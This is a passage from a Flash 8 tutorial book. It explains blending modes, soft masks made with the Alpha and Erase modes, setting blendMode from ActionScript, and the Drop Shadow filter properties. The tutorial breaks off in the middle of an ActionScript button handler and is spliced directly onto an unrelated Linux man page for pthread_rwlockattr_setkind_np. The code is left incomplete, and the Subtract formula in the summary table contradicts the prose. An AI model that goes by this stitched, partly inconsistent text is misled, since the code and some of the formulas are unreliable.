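The per-channel arithmetic behind Darken can be sketched in a couple of lines. This is the standard compositing formula written in plain JavaScript, not Flash's internal implementation:

```javascript
// Darken: for each RGB channel (0-255), keep whichever pixel is darker.
// Sketch of the standard formula, not Flash's internal code.
function darkenChannel(source, dest) {
  return Math.min(source, dest);
}

darkenChannel(40, 200); // 40 — the darker source value punches through
```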
Multiply Mode
Similar to the Darken mode, Multiply mode does just what you might expect it to do. It multiplies the pixels in both the sourceMC and destinationMC.
Unlike Darken, which substitutes and displays the darker of the two
overlapping pixels, the Multiply mode multiplies the two color values.
The resulting color will always be at least as dark as either of the two colors
from sourceMC and destinationMC (shown in Figure 2-6).
[image: Image from book]
Figure 2-6: Affected image when Multiply blending mode is applied from sourceMC to destinationMC
This image looks very similar to the last example
using Darken; however, you should be able to see that some areas have
become darker still as a result of the multiplying effect. Keep in mind
that multiplying a color with black will always result in having black
in the resulting image, while multiplying with white will always leave
the destinationMC colors unchanged.
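The black and white behavior described above falls directly out of the standard multiply formula, sketched here in plain JavaScript (not Flash's internal code):

```javascript
// Multiply: scale the two channels against each other (0-255 range).
// Multiplying with black (0) always yields black; multiplying with
// white (255) leaves the destination unchanged.
function multiplyChannel(source, dest) {
  return Math.round((source * dest) / 255);
}

multiplyChannel(0, 180);   // 0   — black stays black
multiplyChannel(255, 180); // 180 — white leaves the destination unchanged
```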
Lighten Mode
As expected, the Lighten mode does the exact opposite of the Darken mode. Here, the lighter color of the sourceMC and destinationMC is chosen. If the sourceMC pixel is lighter than the pixel beneath it in the destinationMC, this color is used in the resulting image—otherwise the destinationMC pixel is left unchanged (shown in Figure 2-7).
[image: Image from book]
Figure 2-7: Affected image when Lighten blending mode is applied from sourceMC to destinationMC
In Figure 2-7 you can clearly see that only the lighter elements from the sourceMC
(in this case, the icing and feather) are displayed over the building.
This type of effect is often used in superimposing text and titles over
images and video, in order to create more fluid and soft-edged type
treatments.
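As with Darken, the per-channel formula is a one-liner; a plain-JavaScript sketch of the standard formula (not Flash's internal code):

```javascript
// Lighten: the exact opposite of Darken — keep whichever pixel is lighter
// (0-255 channel range).
function lightenChannel(source, dest) {
  return Math.max(source, dest);
}

lightenChannel(40, 200); // 200 — the lighter value wins
```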
Screen Mode
Just as the Lighten blending mode is the opposite
of the Darken blending mode, so is the Screen mode opposite to the
previously demonstrated Multiply mode. Thus, screening a color with
white will produce white (as black did with Multiply) and screening
with black will leave the color unchanged. Technically, the colors from
both sourceMC and destinationMC
are complemented and then multiplied before the destination image is
replaced with the resulting image. A picture tells a thousand words, so
take a look at the resulting image, shown in Figure 2-8, when Screen mode is applied to the sourceMC.
[image: Image from book]
Figure 2-8: An example of an image when Screen blending mode is applied from sourceMC to destinationMC
Although it's similar to the Lighten blending
mode, you can see how the images take on more of an ethereal and soft
look when this blending mode is applied. This is an excellent blending
mode to use when you need to create highlights or apply a lens flare
dynamically to an image.
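The complement-multiply-complement description above can be sketched directly; again this is the standard formula in plain JavaScript, not Flash's internal code:

```javascript
// Screen: complement both channels, multiply, then complement the result —
// the mirror image of Multiply (0-255 range). Screening with white yields
// white; screening with black leaves the destination unchanged.
function screenChannel(source, dest) {
  return 255 - Math.round(((255 - source) * (255 - dest)) / 255);
}

screenChannel(255, 100); // 255 — white produces white
screenChannel(0, 100);   // 100 — black leaves the destination unchanged
```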
Overlay Mode
The Overlay blending mode either multiplies or
screens the colors, depending on the destination color you've chosen.
The effect is that the sourceMC will be overlaid on the destinationMC while maintaining all of its highlights and shadows. The resulting composition generally will contain more of the destinationMC image, as shown in Figure 2-9.
[image: Image from book]
Figure 2-9: An example of an image when Overlay blending mode is applied from sourceMC to destinationMC
This effect looks similar to having both images on
transparency. The color values will be overlaid and create a blend of
colors between source and destination. However, unlike transparency,
highlights from the source image will remain in the resulting image.
This mode is often used in digital cartooning and
coloring. Artists will often take the outlined illustration, apply the
coloring on another layer, and use the Overlay mode to blend the two
separate layers. It is an interesting way to combine pen-sketch
illustrations and digital coloring techniques.
Hard Light Mode
Hard Light blending mode operates very similarly to the previous Overlay mode, with the exception that color values from the sourceMC, rather than the destinationMC, determine whether overlapping pixels are screened or multiplied. For instance, if the sourceMC color is lighter than mid-grey, the destinationMC is lightened through screening. If the sourceMC color is darker than mid-grey, then the destinationMC is darkened through multiplying. Consequently, a pure black or pure white sourceMC produces pure black or pure white, as shown in Figure 2-10.
[image: Image from book]
Figure 2-10: Example of image when Hard Light blending mode is applied from sourceMC to destinationMC
Just as Overlay generally maintained more of the destinationMC image, you can see from Figure 2-10 that the sourceMC becomes more prevalent when you're using the Hard Light blending mode.
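The source-driven branching between multiply and screen can be sketched as follows; this is the standard Hard Light formula in plain JavaScript (threshold shown at mid-grey), not Flash's internal code:

```javascript
// Hard Light: the SOURCE channel decides the operation — dark source
// channels multiply (darken), light source channels screen (lighten).
// Standard formula sketch, 0-255 range.
function hardLightChannel(source, dest) {
  if (source < 128) {
    return Math.round((2 * source * dest) / 255);                     // multiply
  }
  return 255 - Math.round((2 * (255 - source) * (255 - dest)) / 255); // screen
}

hardLightChannel(0, 100);   // 0   — pure black source gives black
hardLightChannel(255, 100); // 255 — pure white source gives white
```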
Add Mode
The Add blending mode adds the sourceMC to the destinationMC
color values to create the resulting image. The general result is a
soft, bright image, which can be useful when creating dissolves between
images as well as for accomplishing lighting type effects (see Figure 2-11).
[image: Image from book]
Figure 2-11: Affected image when Add blending mode is applied from sourceMC to destinationMC
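The Add formula is simple saturation arithmetic; a plain-JavaScript sketch of the standard formula (not Flash's internal code):

```javascript
// Add: sum the two channels, clamping at white (255). The clamp is why
// the result tends toward a soft, bright image.
function addChannel(source, dest) {
  return Math.min(255, source + dest);
}

addChannel(200, 100); // 255 — clamped at white
addChannel(30, 40);   // 70
```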
Subtract Mode
With the Subtract blending mode, the reverse of the Add blending mode is calculated and the sourceMC is subtracted from the destinationMC. This blending mode can be used for shadow-type effects, as shown in Figure 2-12.
[image: Image from book]
Figure 2-12: Affected image when Subtract blending mode is applied from sourceMC to destinationMC
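Mirroring Add, the Subtract formula clamps at black instead of white; a plain-JavaScript sketch of the standard formula (not Flash's internal code):

```javascript
// Subtract: take the source channel away from the destination,
// clamping at black (0) — hence the shadow-type effects.
function subtractChannel(source, dest) {
  return Math.max(0, dest - source);
}

subtractChannel(100, 80); // 0   — clamped at black
subtractChannel(50, 200); // 150
```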
Difference Mode
This unique blending mode often creates
surprising results. The Difference blending mode operates by
determining the darker of the two colors in sourceMC and destinationMC
and then subtracting the darker of the two from the lighter one. This
way, white will always invert the destination color and black in the sourceMC will create no change. Generally this effect will create the vibrant saturated colors shown in Figure 2-13.
[image: Image from book]
Figure 2-13: An example of an image when Difference blending mode is applied from sourceMC to destinationMC
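The "subtract the darker from the lighter" description above is simply the absolute difference per channel; a plain-JavaScript sketch of the standard formula (not Flash's internal code):

```javascript
// Difference: the absolute distance between the two channels.
// A white source channel always inverts the destination; a black
// source channel leaves it unchanged.
function differenceChannel(source, dest) {
  return Math.abs(source - dest);
}

differenceChannel(255, 100); // 155 — same as inverting 100
differenceChannel(0, 100);   // 100 — no change
```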
Invert Mode
Invert mode is a common image manipulation in many graphic applications and involves inverting the colors of the destinationMC image. However, you can't apply this blending mode to a single destinationMC. Here, the sourceMC is used merely to represent the area of the destinationMC that you wish to invert. Similar to a mask, only the overlapping areas will invert the destinationMC (see Figure 2-14).
[image: Image from book]
Figure 2-14: An example of an image when Invert blending mode is applied from sourceMC to destinationMC
It's important to know that this blending mode behaves differently depending on the alpha of the sourceMC. The alpha of the sourceMC determines the strength of the invert on the destinationMC. Applying an alpha level of 100% to the sourceMC creates a full invert; however, if you adjust the alpha of the sourceMC
to 50% you will notice that the entire image goes grey, and reducing it
further toward 0% produces no invert whatsoever. This is a significant
difference from the use of a mask, and you should be aware of it if you
plan to animate MovieClips with alpha while using the Invert blending mode.
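The grey-at-50% behavior described above falls out of alpha-weighted inversion. The sketch below is an illustrative formula in plain JavaScript, not Flash's internal code:

```javascript
// Alpha-weighted invert: at 100% source alpha the destination channel is
// fully inverted, at 50% every channel lands on mid-grey, and at 0%
// nothing changes. Illustrative formula only, 0-255 channel range.
function invertChannel(dest, sourceAlpha) { // sourceAlpha in 0..1
  return Math.round(sourceAlpha * (255 - dest) + (1 - sourceAlpha) * dest);
}

invertChannel(200, 1);   // 55  — full invert
invertChannel(200, 0.5); // 128 — every channel collapses to mid-grey
invertChannel(200, 0);   // 200 — unchanged
```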
Now that you are familiar with what will
likely be the most commonly used blending modes available in Flash 8,
it's time to take a look at several more blending modes, all of which
operate a little differently than the modes covered so far. To access
the Alpha, Erase, and Layer blending modes, we need to create a
composition clip to properly achieve the blending effects.
Applying Layer, Alpha, and Erase Blending Modes
With the addition of these new blending modes
comes a special set of operations that have been long awaited. For
years, creating a soft mask in Flash has been no easy task. Creating
mask layers with alpha has never produced the soft-faded mask that you
might have expected—instead it has always assumed the shape of the
object and not the alpha information it contains. However, many wishes
have been fulfilled with the addition of the new Layer blending mode,
which finally allows you to create soft-feathered masks using alpha
gradients.
Using the Layer blending mode involves a few more steps than the blending modes covered so far, but the payoff is well worth it. So, let's get on with it.
Layer Blending Mode
As mentioned, using the Layer blending mode
requires some additional steps to generate the desired effects, and
uses both Alpha and Erase blending modes. These sets of blending modes
can work in conjunction, but they require the creation of an additional
MovieClip for compositing the final result.
The reason this extra composition movie clip is required is that, unlike imaging applications such as Fireworks or Photoshop, which use a layer hierarchy, Flash uses an entirely different hierarchical structure for managing elements and objects on the stage. For this reason, using Alpha and Erase requires that an additional parent movie clip be set to the Layer blending mode. Flash treats this movie clip as a new canvas where the embedded blending modes are calculated; the parent clip is then redrawn using Normal mode. This process is necessary because Flash can't modify the opacity of the main (root) timeline, and both of these blending modes rely on opacity, and thus alpha, modifiers.
But enough with the technical explanations—no doubt you are anxious to see how easily we can create soft masks!
Alpha Mode: Creating Soft Masks
The purpose of the Alpha blending mode is to use the alpha information of the movie clip it is applied to, inside the composition Layer movie clip, to control what is displayed. Any area of that movie clip that is transparent (using alpha values) causes the same area of the sourceMC to become transparent, allowing the destinationMC image beneath to show through. This may seem confusing at first, so let's take a look at the following example, which clearly illustrates the structure required to use the Alpha blending mode. When completed, you will have a feathered circle mask displaying the destinationMC through the sourceMC.
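Before walking through the steps, it may help to see the per-pixel arithmetic that a soft mask implies. The sketch below is an illustration of the math only, not Flash's implementation, and the function name is our own: the mask's alpha mixes a source and destination channel value, so opaque mask areas keep the sourceMC, transparent areas reveal the destinationMC, and values in between feather the edge.

```c
/* Weighted per-channel mix controlled by a mask's alpha (0.0 to 1.0).
 * mask_alpha = 1.0 keeps the source pixel; 0.0 reveals the destination;
 * intermediate values produce the soft, feathered transition. */
int soft_mask(int src, int dst, double mask_alpha)
{
    double v = src * mask_alpha + dst * (1.0 - mask_alpha);
    return (int)(v + 0.5); /* round to the nearest 8-bit value */
}
```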
Start by opening BlendingModes.fla,
which is the file you used in the previous examples. You will be
modifying this file yourself, in order to familiarize yourself with the
concept of using Layer and Alpha blending modes. If you want to jump
right ahead and see the finished product, you can take a look at the AlphaBlending.fla which is the completed file created by following the steps below.
Creating a composition movie clip using the Layer blending mode
The first thing you need to do is modify the existing sourceMC and transform it into a precomposition movie clip.
Select sourceMC, which is located on the top layer (you may want to lock the destinationMC layer, as you won't need to modify it in this example) and change the blending mode to Layer using the Blend drop-down menu on the Property Inspector.
Figure 2-15: Setting the parent composition movie clip to the Layer blending mode
You'll notice that it appears the same as it would in the Normal blending mode. Your sourceMC image is the only thing visible, blocking out the destinationMC image that lies beneath it.
With sourceMC set to
the Layer blending mode, double-click on sourceMC to enter "Edit in
Place" mode, and add a new layer on top and label it sourceMask.
Figure 2-16: Creating a layer for the Alpha blending mode to be applied to the sourceMC Timeline
The sourceMask layer is the layer that will contain the masking movie clip you will create next.
With the sourceMask layer selected, draw a circle on the stage. Open the Color Mixer palette (Shift+F9 if it isn't already visible at the right side of the screen). With the newly drawn circle selected, use the Color Mixer palette to set the fill to Radial.
Figure 2-17: Creating an alpha gradient to be used with the Alpha blending mode
Since the goal is to create a soft feathered mask, you need to adjust the inner gradient alpha value and set it to 0. By doing this, the gradient fades from full opacity on the outside to a transparent center region. Select the left gradient color and set its alpha to 0.
Figure 2-18: Setting inner gradient alpha level to 0% for displaying destinationMC
Your new gradient circle should now have an alpha fade and provide a preview of the final effect.
Figure 2-19: Preview of feathered mask region inside the sourceMC
However, this preview of the alpha mask is currently over your sourceMC image, which is not what we want. Remember, the objective is to mask the destinationMC image through this newly created mask. The next steps are crucial for achieving this.
Since blending modes can only be applied to movie clips, you must now select your newly created alpha gradient circle and turn it into a movie clip. With it selected, choose Modify ➤ Convert to Symbol (F8) and give it the name sourceMask.
To utilize this alpha information, you must now
select your newly created sourceMask movie clip and change its blending
mode to Alpha in the Property Inspector. Once you have done this,
you'll notice that sourceMask is now invisible on the stage, with only its bounding box showing.
Figure 2-20: How the sourceMask appears inside sourceMC when set to Alpha blending mode
Fear not! Although the destinationMC clip appears invisible inside the sourceMC movie clip, if you return to the main Timeline by selecting the Scene 1 link, you'll see that the same destinationMC clip is now being displayed through the alpha gradient clip that you created.
Figure 2-21: Final completed Alpha blend effect when previewed on main Timeline
It's as easy as that! This is just the beginning of the interesting and creative things that can be done with this fabulous new blending mode. For instance, with this file, try creating different sourceMask clips containing different shapes, sizes, and alpha gradients. Experiment! Explore!
Another beautiful aspect of the Alpha blending mode is that it can be animated as well. For instance, in your sourceMC Timeline, try animating your newly created sourceMask clip. Try scaling or moving it, and note how the alpha information is transferred to the destinationMC when you test your movie. With luck, this will be the beginning of a whole new world of creative possibilities for your Flash projects.
Erase Mode
With the Erase blending mode, you use the same
process that you used with the Alpha mode—which, as you'll remember,
requires the creation of a parent composition MovieClip set to a Layer
blending mode.
The generated effect, however, is the opposite of what
was seen with the Alpha blending mode. When you use Erase, the opaque
areas of the alpha gradient remove areas of the destinationMC. Areas with low alpha will allow the destinationMC to be seen through the sourceMC. You can see this opposite effect in the following image.
Figure 2-22: Final completed Erase blend effect when previewed on main Timeline
Although the blending modes demonstrated so far in this chapter have been applied manually in the Flash IDE, blending modes are also available as a MovieClip property and can be accessed via ActionScript, and it couldn't be easier!
Applying Blends Using ActionScript
In Flash 8, the ability to access blending modes has been extended beyond the IDE and is now available through ActionScript. You can modify a movie clip's blending mode by setting the new blendMode property. Macromedia defines this new property by saying that blendMode is "The blending mode for this movie clip. The blending mode affects the appearance of the movie clip when it is in a layer above another object on-screen."
Reopen BlendingModes.fla if you don't still have it open.
Create a new layer and label it Actions.
On frame 1, create a frame action with the following code:
sourceMC.blendMode = "darken";
If you test the movie now, you will see that this code overrides whatever blending mode was set manually in the Property Inspector. The blendMode property accepts both strings and numbers (1-14) as values, so if you are using a string, make sure it is enclosed in quotation marks. For instance, for the Multiply blend you can use either:
sourceMC.blendMode = "multiply";
sourceMC.blendMode = 3;
If you'd like to see quickly how all the blending modes look, open the BlendingModesAS.fla file. It is the same as BlendingModes.fla, with the addition of a ComboBox component that dynamically changes the blending mode of the sourceMC movie clip whenever a new selection is made in the ComboBox.
Figure 2-23: BlendingModesAS.fla, ready to go.
The additional code used to perform this is also very simple, as you can see:
modeChangeListener = new Object(); // Create the listener object
// Define the 'change' event
modeChangeListener.change = function(evtObj) {
    // Set the blendMode to the value of the label
    // of the selected item in the blend_cb ComboBox
    sourceMC.blendMode = evtObj.target.selectedItem.label;
};
// Assign the change event to blend_cb
blend_cb.addEventListener("change", modeChangeListener);
In the function called when a selection is made, the ComboBox component simply passes the selected item's label (a string) to the blendMode property.
Summary
And so concludes our lesson on the incredible blending modes now supported in Flash 8. This is just the tip of the iceberg with regard to the new visual enhancements available in Flash 8, as you'll soon see. In the next chapter you will discover the wonderful new world of Flash filters.
Table 2-1: A summary of the different blending modes
blendMode    Result of sourcePixel and destPixel

Normal       sourcePixel

Darken       if (sourcePixel < destPixel) sourcePixel
             else destPixel

Multiply     sourcePixel x destPixel

Lighten      if (sourcePixel > destPixel) sourcePixel
             else destPixel

Screen       1 - (1 - sourcePixel) x (1 - destPixel)

Overlay      if (destPixel < 0.5) Multiply sourcePixel with destPixel
             else Screen sourcePixel with destPixel

Hard Light   if (sourcePixel < 0.5) Multiply sourcePixel with destPixel
             else Screen sourcePixel with destPixel

Add          sourcePixel + destPixel

Subtract     (sourcePixel + destPixel) - 1

Difference   | sourcePixel - destPixel |

Invert       1 - destPixel
Note that, in all cases, the math is performed on the red, green, and blue component values separately to produce the final pixel's red, green, and blue components. So, Multiply actually does the following:
newRed = sourceRed x destRed
newGreen = sourceGreen x destGreen
newBlue = sourceBlue x destBlue
The final pixel is (newRed, newGreen, newBlue).
Though channel values are represented digitally as numbers from 0 to 255, they are treated as if they were in the range 0 to 1 when the blend operations take place. This way, multiplying 128 x 128, which would normally give 16,384, is actually treated as 0.5 x 0.5, resulting in 0.25, which digitally is 64. In some cases, for example with Add and Subtract, where a resulting value would be greater than 1 (255) or less than 0, the value is simply clamped to 255 or 0.
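The normalization and clamping described above can be sketched in a few lines of C. This is an illustration of the arithmetic only; the helper names are ours, and Flash's internal implementation may differ.

```c
/* Convert an 8-bit channel (0-255) to the unit range used for blending. */
static double to_unit(int c) { return c / 255.0; }

/* Convert back to 0-255, clamping out-of-range results as Add/Subtract do. */
static int to_byte(double v)
{
    if (v < 0.0) v = 0.0;
    if (v > 1.0) v = 1.0;
    return (int)(v * 255.0 + 0.5);
}

/* Multiply blend on one channel: 128 x 128 comes out as 64, as described. */
int blend_multiply(int src, int dst)
{
    return to_byte(to_unit(src) * to_unit(dst));
}

/* Add blend on one channel: sums above 1.0 (digitally 255) are clamped. */
int blend_add(int src, int dst)
{
    return to_byte(to_unit(src) + to_unit(dst));
}
```

With these helpers, blend_multiply(128, 128) reproduces the 0.5 x 0.5 = 0.25 (digitally 64) example from the text.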
Chapter 3: Filters
by Glenn Rhodes and Craig Swann
As you saw in the previous chapter, there are plenty of new creative ways to work with visual assets in Flash 8. However, blending modes are just the beginning! As you will see in this chapter, some very powerful new possibilities open up through the use of the new filters that are available.
More than likely, if you have ever worked with image assets in Fireworks or Photoshop, you are familiar with filters. In these imaging applications, filters such as Blur, Glow, and Bevel are common (if not overused). These same filters, as well as many more, can now be harnessed directly inside Flash 8. Although at times it may be better to treat images and text in an imaging application first, in order to save on processing power, the ability to use filters inside the Flash environment is an indispensable way to create quick, easy, and often powerful visual effects.
As with the previously covered blending modes, filters can be accessed and manipulated both through the Flash 8 IDE and directly through ActionScript. The big difference between filters and blends is that filters can be animated! This opens up even more options for both the designer and the developer using Flash. Let's first take a look at the filters that are now available in Flash 8.
Remember that you can download all the code examples featured in this chapter from.
Filters Available in the Flash IDE
The following filters are available in the Flash IDE:
Drop Shadow: Places a black shadow beneath an object giving it the appearance of "floating" above the stage.
Blur: Defocuses an object, giving it the appearance of looking through smudged glass, or a poorly focused lens.
Glow: Creates a slight glowing outline around an object, following the contours and curves of the object perfectly.
Bevel: Creates a shadow and a highlight on opposite edges of an
object, giving the illusion that it is 3D. Bevel is very common, and
most user interface buttons in regular applications have a Bevel filter.
Gradient Glow: Similar to the Glow filter, except the glow itself may follow a gradient of color from the inner to the outer edge.
Gradient Bevel: Similar to the Bevel filter, except you can specify a gradient color on the shadow and highlights of the beveled edges.
Adjust Color: Allows you to adjust the brightness, hue, and saturation of an object.
ActionScript Filters
The following filters are available in ActionScript:
Color Matrix: Allows you to perform several color tricks,
including all those accessible in the previously mentioned Adjust Color
filter, as well as effects similar to the setTransform method of the Color object.
Displacement Map: Allows you to move pixels by a certain amount,
both horizontally and vertically, and independent of each other.
Creates popular effects like warp, bend, water ripples, and more.
Convolution: A filter that allows you to perform various effects
by performing adjustments to pixels, based on the color of their
adjacent pixels.
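To make the idea behind the Convolution filter concrete, here is a minimal sketch in C of a 3x3 convolution on a single grayscale channel: each output pixel is a weighted sum of its neighbors, divided by a divisor. This illustrates the principle only (it is not the ActionScript ConvolutionFilter API; the function name and edge handling are our own).

```c
/* Apply a 3x3 kernel k at pixel (x, y) of a w-by-h grayscale image.
 * Edge pixels reuse the nearest in-bounds neighbor (simple clamping). */
int convolve3x3(const unsigned char *img, int w, int h,
                int x, int y, const double k[9], double divisor)
{
    double sum = 0.0;
    for (int dy = -1; dy <= 1; dy++) {
        for (int dx = -1; dx <= 1; dx++) {
            int sx = x + dx;
            int sy = y + dy;
            if (sx < 0) sx = 0;
            if (sx >= w) sx = w - 1;
            if (sy < 0) sy = 0;
            if (sy >= h) sy = h - 1;
            sum += img[sy * w + sx] * k[(dy + 1) * 3 + (dx + 1)];
        }
    }
    sum /= divisor;
    if (sum < 0) sum = 0;       /* clamp to the valid channel range */
    if (sum > 255) sum = 255;
    return (int)(sum + 0.5);
}
```

An identity kernel (all zeros, 1 in the center, divisor 1) returns the pixel unchanged; a box-blur kernel of all ones with divisor 9 averages the 3x3 neighborhood, which is the kind of operation behind blur-style effects.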
As you can see, there is a lot to play with. You will also notice that the list above is separated out because these filters are specific to ActionScript. Convolution, Color Matrix, and Displacement Map are very powerful and complex filters, and they can only be used in conjunction with ActionScript; they are not available from the Filters tab. Don't fret: as complex as this may sound, the examples later in this chapter will give you the knowledge necessary to begin using these filters, even if you are not a hardcore ActionScript developer.
This chapter will cover both methods of applying
filters, but let's start with the most direct way of adding filters to
your Flash projects—through the Flash 8 IDE.
Applying Filters Using the Flash 8 IDE
Unlike blending modes, filters offer a little more flexibility: you can apply a filter to a movie clip, a button, or a TextField (whether static or dynamic). Filters are available in the Flash authoring environment through the Property Inspector. A new tab called Filters has been added to the Inspector, as seen in Figure 3-1; this is where you will find the filters that are accessible through the IDE. Let's dive right in and start exploring how easy it is to apply filters.
Figure 3-1: New Filters tab in the Property Inspector for applying filters to text, movie clips, and buttons
Drop Shadow
Creating soft drop shadows in previous versions of Flash was not always possible. Generally, you could create alpha gradients and use Soften Fill Edges (Modify ➤ Shape ➤ Soften Fill Edges…) to simulate the effect, or create shadows in Photoshop and then import them. However, this was often not very useful, because you could never use it with dynamic movie clips or Dynamic Text, which might change shape or size. The now-available Drop Shadow filter makes it a snap to instantly add a realistic drop shadow to any existing object on stage, whether it's text, a movie clip, or a button. If you're interested, take a look at to see how you used to have to add drop shadows in Flash. It wasn't pretty, and it wasn't fun.
Let's start off by adding a drop shadow to dynamic text.
Adding a Drop Shadow to Dynamic Text
For this example, you will add a Drop Shadow to some Dynamic Text. As you'll soon see, there's nothing to it!
With a new document open, complete the following steps:
Select the Text tool, click on the stage, and type "Flash 8 Rocks!" (OK, OK, feel free to type whatever you like, if you feel so inclined, but Flash 8 does rock.)
With the text selected, open the Property Inspector, make sure Dynamic Text is selected as the text type, and give it the instance name dynamicText. You'll need this a little later, and it should look something like the following:
Now select the text field on stage and, in the Property Inspector, click the all-new-for-Flash-8 Filters tab.
You will notice there is an option to add new filters using the Add Filter (+) button.
Click the Add Filter (+) button in the Filters tab and then, from the drop-down menu, select the Drop Shadow option.
You will notice that, as soon as you do this, the text instantly takes on some default properties, and the full set of Drop Shadow properties becomes available, to be modified to your every whim. Our dynamic text now looks like the image below, with the properties visible in the Property Inspector.
Now that you have created your first Drop Shadow
example, let's take a look at the properties in more depth so you can
begin experimenting.
Figure 3-2: Creating Dynamic Text with instance name dynamicText
Figure 3-3: New Filters tab in the Property Inspector for adding filters.
Figure 3-4: New filters available through the Filters tab in the Property Inspector.
Figure 3-5: Adding a Drop Shadow through the Filters tab in the Property Inspector.
Drop Shadow Properties
The following modifiable properties exist within the Drop Shadow filter.
Blur X and Blur Y
Blur X and Blur Y affect the amount of blur that the drop shadow receives. By default, the two values are constrained together, using the small lock icon next to the property input fields; quite often this generates the most realistic drop shadow effect. However, you can also unlock the constraint by clicking the lock icon and set individual values (0-100) for the X and Y blur. Don't forget that this property, like all the others, can be animated on the Timeline to create lighting effects (see Figures 3-6 and 3-7).
Figure 3-6: Drop Shadow with Default Blur values of Blur X = 5 and Blur Y = 5.
Figure 3-7: Drop Shadow with Modified Blur values of Blur X = 5 and Blur Y = 20
Color
The Color property works just as the other color palette options in the Flash environment do: it sets the color to be used for the drop shadow. You'll also notice that the Color property includes an alpha value, which can be used to create softer drop shadows as the alpha value approaches 0. You can see some examples in Figures 3-8 and 3-9.
Figure 3-8: Drop Shadow with Default Color Selection
Figure 3-9: Drop Shadow with Color settings modified to a hex value of #FF9999 and an alpha value of 50%
Strength
The Strength property represents the filter strength being used, and creates effects very similar to those produced by changing the alpha value in the Color property. The property accepts values from 0 to 1000%. Generally, values between 0 and 100% will suffice, but at times you can generate interesting results by using the upper region of the range. As with all the new features in Flash 8, it's best to experiment and see how these properties work in your own Flash projects, as shown in Figures 3-10 and 3-11.
Figure 3-10: Drop Shadow with Default Settings of Strength = 100%
Figure 3-11: Drop Shadow with Modified Settings of Strength = 1000%
Angle
The Angle property does just what you think it does: it sets the angle (0-360) that the light source is coming from. By modifying the Angle, you can adjust the direction, and ultimately the position, of the generated drop shadow. As this property can also be animated on the timeline (or in ActionScript, as you will see later), you can use it to create the illusion of a moving light source. See Figures 3-12 and 3-13 for more details.
Figure 3-12: Drop Shadow with Default Angle setting of 45
Figure 3-13: Drop Shadow with Modified Angle setting of 315
Distance
The Distance property works in conjunction with the Angle property. Based on the angle of the light source used to create the drop shadow, the Distance value (-32 to +32) sets how far the drop shadow is placed from the object it is applied to. Negative values move the drop shadow closer to the calculated light source, and positive values move it further away. As another property that can be animated, Distance, in conjunction with other changing property values, can greatly enhance the illusion of a moving light source. You'll see what we mean in Figures 3-14 and 3-15.
Figure 3-14: Drop Shadow with default Distance setting of 5
Figure 3-15: Drop Shadow with modified Distance setting of 15
Quality
Quality sets the quality level of the drop shadow. If you toggle this value, you will see subtle differences in the quality of the visual representation. Be aware, however, that a Quality setting of High requires more processing power. When animating, or applying motion to objects that have filters applied, it is best to keep the Quality setting at Low; you'll find that even at this setting you can still create quality effects.
Knockout
Knockout is a property that can be toggled on and off and is used to knock out the source image. Take a look at Figures 3-16 and 3-17 to see the difference that is made when this property is turned on and off.
Figure 3-16: Drop Shadow with Knockout deselected
Figure 3-17: Drop Shadow with Knockout selected
Inner Shadow
The Inner Shadow property creates a cutout of the source object and places the drop shadow inside the object instead. You can clearly see the effect in Figures 3-18 and 3-19.
Figure 3-18: Drop Shadow with Inner Shadow deselected
Figure 3-19: Drop Shadow with Inner Shadow selected
Hide Object
The final available property for Drop Shadow is Hide Object, which keeps the original object from being rendered to the screen at all and instead shows only the Drop Shadow filter effect. You'll see some examples in Figures 3-20 and 3-21.
Figure 3-20: Drop Shadow with original settings
Figure 3-21: Drop Shadow with Hide Object selected
As you can see, there is a vast range of visual options to choose from when using the Drop Shadow filter. Spend some time experimenting with all the properties and finding combinations that you like. Before we move on to the Blur filter, though, as promised, let's prove that all of these funky new effects can be applied to text dynamically, using ActionScript.
Modifying the Dynamic Text
Create a button on the stage, above your dynamicText field from earlier, and give it the instance name my_btn.
Create a new layer in the timeline, click on the first frame, and then enter the following code:
// Create an array of 3 phrases
var words:Array = ["Flash 8 Rocks!","Who would have thought!",
"OMG Dynamic Drop Shadows"];
// Attach code to the button
my_btn.onPress=function(){
// Choose a random number from 0 to the number of elements
// in the array.
PTHREAD_RWLOCKATTR_SETKIND_NP(3)    Linux Programmer's Manual    PTHREAD_RWLOCKATTR_SETKIND_NP(3)

NAME
       pthread_rwlockattr_setkind_np, pthread_rwlockattr_getkind_np - set/get the read-write lock kind of the thread read-write lock attribute object

SYNOPSIS
       #include <pthread.h>

       int pthread_rwlockattr_setkind_np(pthread_rwlockattr_t *attr,
                                         int pref);
       int pthread_rwlockattr_getkind_np(const pthread_rwlockattr_t *attr,
                                         int *pref);

       Compile and link with -pthread.

   Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

       pthread_rwlockattr_setkind_np(), pthread_rwlockattr_getkind_np():
           _XOPEN_SOURCE >= 500 || _POSIX_C_SOURCE >= 200809L

DESCRIPTION
       The pthread_rwlockattr_setkind_np() function sets the "lock kind" attribute of the read-write lock attribute object referred to by attr to the value specified in pref.  The argument pref may be set to one of the following:

       PTHREAD_RWLOCK_PREFER_READER_NP
              This is the default.  A thread may hold multiple read locks; that is, read locks are recursive.  According to The Single Unix Specification, the behavior is unspecified when a reader tries to place a lock, and there is no write lock but writers are waiting.  Giving preference to the reader, as is set by PTHREAD_RWLOCK_PREFER_READER_NP, implies that the reader will receive the requested lock, even if a writer is waiting.  As long as there are readers, the writer will be starved.

       PTHREAD_RWLOCK_PREFER_WRITER_NP
              This is intended as the write lock analog of PTHREAD_RWLOCK_PREFER_READER_NP.  This is ignored by glibc because the POSIX requirement to support recursive writer locks would cause this option to create trivial deadlocks; instead use PTHREAD_RWLOCK_PREFER_WRITER_NONRECURSIVE_NP, which ensures that the application developer will not take recursive read locks, thus avoiding deadlocks.

       PTHREAD_RWLOCK_PREFER_WRITER_NONRECURSIVE_NP
              Setting the lock kind to this avoids writer starvation as long as any read locking is not done in a recursive fashion.

       The pthread_rwlockattr_getkind_np() function returns the value of the lock kind attribute of the read-write lock attribute object referred to by attr in the pointer pref.
On success, these functions return 0. Given valid pointer arguments, pthread_rwlockattr_getkind_np() always succeeds. On error, pthread_rwlockattr_setkind_np() returns a nonzero error number.
EINVAL pref specifies an unsupported value.
The pthread_rwlockattr_getkind_np() and pthread_rwlockattr_setkind_np() functions first appeared in glibc 2.1.
These functions are non-standard GNU extensions; hence the suffix "_np" (nonportable) in the names.
pthreads(7)
This page is part of release 5.01 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. Linux Programmer's Manual 2019-03-06 PTHREAD_RWLOCKATTR_SETKIND_NP(3)
